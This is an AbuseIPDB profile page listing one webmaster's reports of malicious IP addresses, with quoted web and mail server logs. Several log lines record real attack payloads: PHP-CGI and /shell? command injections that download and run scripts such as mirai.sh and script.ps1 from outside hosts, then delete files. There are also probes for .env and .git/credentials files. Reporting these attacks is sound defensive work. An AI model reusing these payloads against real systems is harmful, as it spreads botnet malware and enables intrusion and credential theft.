User Fox River Dan , the webmaster of foxriver.net, joined AbuseIPDB in June 2021 and has reported 389 IP addresses.
Standing (weight) is good.
ACTIVE USER
WEBMASTER
SUPPORTER
- « Previous
- Next »
IP | Date | Comment | Categories |
---|---|---|---|
87.120.125.13 |
87.120.125.13 - - [04/Jan/2025:18:24:57 -0600] "GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text ... show more87.120.125.13 - - [04/Jan/2025:18:24:57 -0600] "GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?> HTTP/1.1" 401 7899 "-" "Go-http-client/1.1" "(node: 0)" show less
|
Hacking Exploited Host Web App Attack | |
23.27.51.244 |
87.120.125.13 - - [04/Jan/2025:18:24:57 -0600] "GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text ... show more87.120.125.13 - - [04/Jan/2025:18:24:57 -0600] "GET /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?> HTTP/1.1" 401 7899 "-" "Go-http-client/1.1" "(node: 0)" show less
|
Hacking Exploited Host Web App Attack | |
216.9.227.143 |
98.159.236.220 - - [30/Dec/2024:19:52:21 -0600] "GET /shell?cd /tmp || cd /run || cd /; wget http:// ... show more98.159.236.220 - - [30/Dec/2024:19:52:21 -0600] "GET /shell?cd /tmp || cd /run || cd /; wget http://216.9.227.143/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 216.9.227.143 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 216.9.227.143; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf * HTTP/1.1" 401 7899 "-" "KrebsOnSecurity" "(node: 0)" show less
|
Hacking Exploited Host | |
98.159.236.220 |
98.159.236.220 - - [30/Dec/2024:19:52:21 -0600] "GET /shell?cd /tmp || cd /run || cd /; wget http:// ... show more98.159.236.220 - - [30/Dec/2024:19:52:21 -0600] "GET /shell?cd /tmp || cd /run || cd /; wget http://216.9.227.143/Ciabins.sh; chmod 777 Ciabins.sh; sh Ciabins.sh; tftp 216.9.227.143 -c get Ciatftp1.sh; chmod 777 Ciatftp1.sh; sh Ciatftp1.sh; tftp -r Ciatftp2.sh -g 216.9.227.143; chmod 777 Ciatftp2.sh; sh Ciatftp2.sh; rm -rf Ciabins.sh Ciatftp1.sh Ciatftp2.sh; rm -rf * HTTP/1.1" 401 7899 "-" "KrebsOnSecurity" "(node: 0)" show less
|
Hacking Brute-Force Exploited Host Web App Attack | |
63.141.246.226 | Hacking Web App Attack | ||
198.46.233.239 |
00:45:11 S: Client IP: 198.46.233.239:46838 (198-46-233-239-host.colocrossing.com) Host IP: 50.196.2 ... show more00:45:11 S: Client IP: 198.46.233.239:46838 (198-46-233-239-host.colocrossing.com) Host IP: 50.196.212.73:587
00:45:13 C: helo foxriver.net 00:45:13 S: 250 foxriver.net, Hello 198-46-233-239-host.colocrossing.com, why do you call yourself foxriver.net? 00:45:13 C: mail from: <[email protected]> 00:45:13 S: 530 User not Authenticated. 00:45:13 C: rcpt to: <[email protected]> 00:45:13 S: 503 Need MAIL before RCPT. show less |
Email Spam Hacking Brute-Force | |
192.210.162.147 |
76.11.185.195 - - [21/Dec/2024:19:23:16 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210. ... show more76.11.185.195 - - [21/Dec/2024:19:23:16 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 401 7899 "-" "r00ts3c-owned-you" "(node: 0)" show less
|
Hacking Brute-Force Exploited Host | |
76.11.185.195 |
76.11.185.195 - - [21/Dec/2024:19:23:16 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210. ... show more76.11.185.195 - - [21/Dec/2024:19:23:16 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 401 7899 "-" "r00ts3c-owned-you" "(node: 0)" show less
|
Hacking Brute-Force Exploited Host | |
141.101.105.59 |
141.101.105.59 - - [27/Nov/2024:09:14:29 -0600] "POST /index.php?s=/admin/upload/uploadfile HTTP/1.1 ... show more141.101.105.59 - - [27/Nov/2024:09:14:29 -0600] "POST /index.php?s=/admin/upload/uploadfile HTTP/1.1" 401 4877 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36" "(node: 0)" show less
|
Hacking Brute-Force Web App Attack | |
5.181.3.108 |
45596.ip-ptr.tech - - [24/Nov/2024:08:59:14 -0600] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 401 ... show more45596.ip-ptr.tech - - [24/Nov/2024:08:59:14 -0600] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 401 7092 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" "(node: 0)" show less
|
Hacking Brute-Force Web App Attack | |
136.143.188.248 |
ATTEMPTED SPAM/UBE/UCE
Connection Time: 20241027 13:38:18
Client IP: 136.143. ... show moreATTEMPTED SPAM/UBE/UCE
Connection Time: 20241027 13:38:18 Client IP: 136.143.188.248:16502 (sender4-g12-248.zohomail360.com) Host IP: 50.196.212.73:25 13:38:18 S: 220-************** WARNING: FOR AUTHORIZED USE ONLY! ********************** 13:38:18 S: 220-* THIS SYSTEM DOES NOT AUTHORIZE THE USE OF ITS PROPRIETARY COMPUTERS * 13:38:18 S: 220-* BULK E-MAIL SENT FROM THE INTERNET. THIS SYSTEM WILL RESTRICT ACCESS * 13:38:19 C: EHLO sender4-g12-248.zohomail360.com 13:38:19 S: 250-foxriver.net, Hello sender4-g12-248.zohomail360.com, pleased to meet you. 13:38:19 C: MAIL FROM:<[email protected]> 13:38:19 S: 250 <[email protected]>... Sender validation pending. Continue. 13:38:19 C: RCPT TO:H*I*D*D*E*N 13:38:19 S: 550 User not a member of domain: H*I*D*D*E*N show less |
Email Spam | |
136.143.188.242 |
UBE/UCE SPAM SENT TO ADMIN
20241027 13:41:23.003 00000009 calltype : SMTP
20 ... show moreUBE/UCE SPAM SENT TO ADMIN
20241027 13:41:23.003 00000009 calltype : SMTP 20241027 13:41:23.004 00000009 callerid : 136.143.188.242 20241027 13:41:23.005 00000009 state : rcpt 20241027 13:41:23.006 00000009 cip : 136.143.188.242 20241027 13:41:23.007 00000009 cdn : sender4-g12-242.zohomail360.com 20241027 13:41:23.008 00000009 from : [email protected] 20241027 13:41:23.009 00000009 hdn : sender4-g12-242.zohomail360.com 20241027 13:41:23.010 00000009 rcpt : H*I*D*D*E*N show less |
Email Spam | |
191.242.223.198 |
191-242-223-198.alivenet.com.br - - [19/Oct/2024:18:20:05 -0500] "POST /public/javascript:doWcLoginA ... show more191-242-223-198.alivenet.com.br - - [19/Oct/2024:18:20:05 -0500] "POST /public/javascript:doWcLoginAction(false); HTTP/1.1" 404 3004 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "(node: 0)"
191-242-223-198.alivenet.com.br - - [19/Oct/2024:18:20:06 -0500] "POST /public/javascript:doWcLoginAction(false); HTTP/1.1" 404 3004 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "(node: 0)" show less |
Hacking Brute-Force | |
109.176.207.235 |
host-41.232.44.182.tedata.net - - [15/Sep/2024:09:02:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 10 ... show morehost-41.232.44.182.tedata.net - - [15/Sep/2024:09:02:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.176.207.235/jaws;sh+/tmp/jaws HTTP/1.1" 401 7131 "-" "Hello, world" "(node: 0)" show less
|
Hacking Exploited Host | |
41.232.44.182 |
host-41.232.44.182.tedata.net - - [15/Sep/2024:09:02:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 10 ... show morehost-41.232.44.182.tedata.net - - [15/Sep/2024:09:02:25 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.176.207.235/jaws;sh+/tmp/jaws HTTP/1.1" 401 7131 "-" "Hello, world" "(node: 0)" show less
|
Hacking Exploited Host Web App Attack | |
73.173.68.69 |
c-76-141-146-198.hsd1.il.comcast.net - - [11/Sep/2024:23:18:09 -0500] "GET /shell?cd%20%2Ftmp%3B%20w ... show morec-76-141-146-198.hsd1.il.comcast.net - - [11/Sep/2024:23:18:09 -0500] "GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F73.173.68.69%2Fmalware%2Fmirai.sh%3B%20sh%20mirai.sh HTTP/1.1" 401 7131 "-" "Criptonize https://pastebin.com/HYC9sVWr" "(node: 0)" show less
|
Hacking Exploited Host | |
76.141.146.198 |
c-76-141-146-198.hsd1.il.comcast.net - - [11/Sep/2024:23:18:09 -0500] "GET /shell?cd%20%2Ftmp%3B%20w ... show morec-76-141-146-198.hsd1.il.comcast.net - - [11/Sep/2024:23:18:09 -0500] "GET /shell?cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F73.173.68.69%2Fmalware%2Fmirai.sh%3B%20sh%20mirai.sh HTTP/1.1" 401 7131 "-" "Criptonize https://pastebin.com/HYC9sVWr" "(node: 0)" show less
|
Hacking Exploited Host Web App Attack | |
45.145.165.64 |
host-197.39.83.176.tedata.net - - [03/Sep/2024:15:03:58 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45 ... show morehost-197.39.83.176.tedata.net - - [03/Sep/2024:15:03:58 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 401 1749 "-" "Hello, world" "(node: 0)" show less
|
Exploited Host Web App Attack | |
197.39.83.176 |
host-197.39.83.176.tedata.net - - [03/Sep/2024:15:03:58 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45 ... show morehost-197.39.83.176.tedata.net - - [03/Sep/2024:15:03:58 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws HTTP/1.1" 401 1749 "-" "Hello, world" "(node: 0)" show less
|
Brute-Force Exploited Host Web App Attack | |
173.239.224.44 |
173.239.224.44 - - [06/Aug/2024:10:05:48 -0500] "POST /_profiler/phpinfo HTTP/1.1" 401 6236 "-" "Moz ... show more173.239.224.44 - - [06/Aug/2024:10:05:48 -0500] "POST /_profiler/phpinfo HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.44 - - [06/Aug/2024:10:05:49 -0500] "POST /phpinfo.php HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.44 - - [06/Aug/2024:10:06:03 -0500] "POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.44 - - [06/Aug/2024:10:06:10 -0500] "GET /blog/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.44 - - [06/Aug/2024:10:06:10 -0500] "POST /admin/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 show less |
Port Scan Hacking Web App Attack | |
173.239.224.43 |
173.239.224.43 - - [06/Aug/2024:10:05:47 -0500] "POST /frontend/web/debug/default/view HTTP/1.1" 401 ... show more173.239.224.43 - - [06/Aug/2024:10:05:47 -0500] "POST /frontend/web/debug/default/view HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.43 - - [06/Aug/2024:10:06:04 -0500] "GET /.git/credentials HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.43 - - [06/Aug/2024:10:06:06 -0500] "POST /.svn/entries HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.43 - - [06/Aug/2024:10:06:16 -0500] "GET /public/.env HTTP/1.1" 404 8411 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.43 - - [06/Aug/2024:10:06:23 -0500] "POST /sites/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, show less |
Port Scan Hacking Web App Attack | |
173.239.224.42 |
173.239.224.42 - - [06/Aug/2024:10:06:08 -0500] "POST /wp-admin/.env HTTP/1.1" 401 6236 "-" "Mozilla ... show more173.239.224.42 - - [06/Aug/2024:10:06:08 -0500] "POST /wp-admin/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.42 - - [06/Aug/2024:10:06:09 -0500] "POST /vendor/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.42 - - [06/Aug/2024:10:06:13 -0500] "GET /base/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.42 - - [06/Aug/2024:10:06:18 -0500] "POST /lib/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" show less |
Port Scan Hacking Web App Attack | |
173.239.224.41 |
173.239.224.41 - - [06/Aug/2024:10:05:46 -0500] "GET /debug/default/view.html HTTP/1.1" 401 6236 "-" ... show more173.239.224.41 - - [06/Aug/2024:10:05:46 -0500] "GET /debug/default/view.html HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.41 - - [06/Aug/2024:10:05:50 -0500] "POST /.env.bak HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.41 - - [06/Aug/2024:10:06:06 -0500] "GET /.svn/entries HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.41 - - [06/Aug/2024:10:06:08 -0500] "GET /library/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.41 - - [06/Aug/2024:10:06:09 -0500] "POST /local/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81 show less |
Port Scan Hacking Web App Attack | |
173.239.224.40 |
173.239.224.40 - - [06/Aug/2024:10:06:04 -0500] "POST /.git/credentials HTTP/1.1" 401 6236 "-" "Mozi ... show more173.239.224.40 - - [06/Aug/2024:10:06:04 -0500] "POST /.git/credentials HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.40 - - [06/Aug/2024:10:06:08 -0500] "GET /vendor/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.40 - - [06/Aug/2024:10:06:10 -0500] "POST /api/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.40 - - [06/Aug/2024:10:06:12 -0500] "GET /cgi-bin/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.40 - - [06/Aug/2024:10:06:13 -0500] "GET /src/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.12 show less |
Port Scan Hacking Web App Attack | |
173.239.224.39 |
173.239.224.39 - - [06/Aug/2024:10:05:44 -0500] "GET / HTTP/1.1" 302 148 "-" "Mozilla/5.0 (X11; Linu ... show more173.239.224.39 - - [06/Aug/2024:10:05:44 -0500] "GET / HTTP/1.1" 302 148 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)"
173.239.224.39 - - [06/Aug/2024:10:05:49 -0500] "POST /phpinfo HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.39 - - [06/Aug/2024:10:06:14 -0500] "POST /base/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.39 - - [06/Aug/2024:10:06:15 -0500] "POST /www/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "(node: 0)" 173.239.224.39 - - [06/Aug/2024:10:06:22 -0500] "GET /blogs/.env HTTP/1.1" 401 6236 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" show less |
Port Scan Hacking Web App Attack |
- « Previous
- Next »